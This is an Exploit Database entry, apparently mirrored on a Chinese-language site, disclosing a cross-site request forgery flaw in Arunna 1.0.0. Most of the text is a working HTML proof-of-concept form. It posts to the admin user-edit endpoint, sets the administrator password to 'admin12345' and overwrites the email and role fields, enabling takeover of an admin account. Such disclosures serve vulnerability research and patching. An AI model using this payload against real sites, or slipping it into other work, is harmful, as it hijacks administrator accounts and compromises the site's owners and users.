Arunna 1.0.0 – ‘Multiple’ Cross-Site Request Forgery (CSRF)

• Exploit Database
• 109 阅读

• 作者： =(L_L)=
  日期： 2021-12-16
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50608/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36

  # Exploit Title: Arunna 1.0.0 - &apos;Multiple&apos; Cross-Site Request Forgery (CSRF) # Date: November 29, 2021 # Exploit Author: =(L_L)= # Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/ # Vendor Homepage: https://github.com/arunna # Software Link: https://github.com/arunna/arunna # Version: 1.0.0 # Tested on: Ubuntu 20.04.2 LTS   <!-- The attacker can use the CSRF PoC below to change any sensitive user data (password, email, name and so on). -->   <html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"><table><tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr><tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr> <tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr> <tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr> <tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr> <tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr> <tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr> <tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr> <tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr> <tr><td>birthmonth[0]</td><td><input type="text" value="3" name="birthmonth[0]"></td></tr> <tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr> <tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr> <tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr> <tr><td>tags[0]</td><td><input type="text" value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr> <tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr> <tr><td>email[0]</td><td><input type="text" value="request@arunna.com" name="email[0]"></td></tr> <tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr> <tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr> <tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr> <tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr> <tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr> <tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr> </table><input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"></form></html>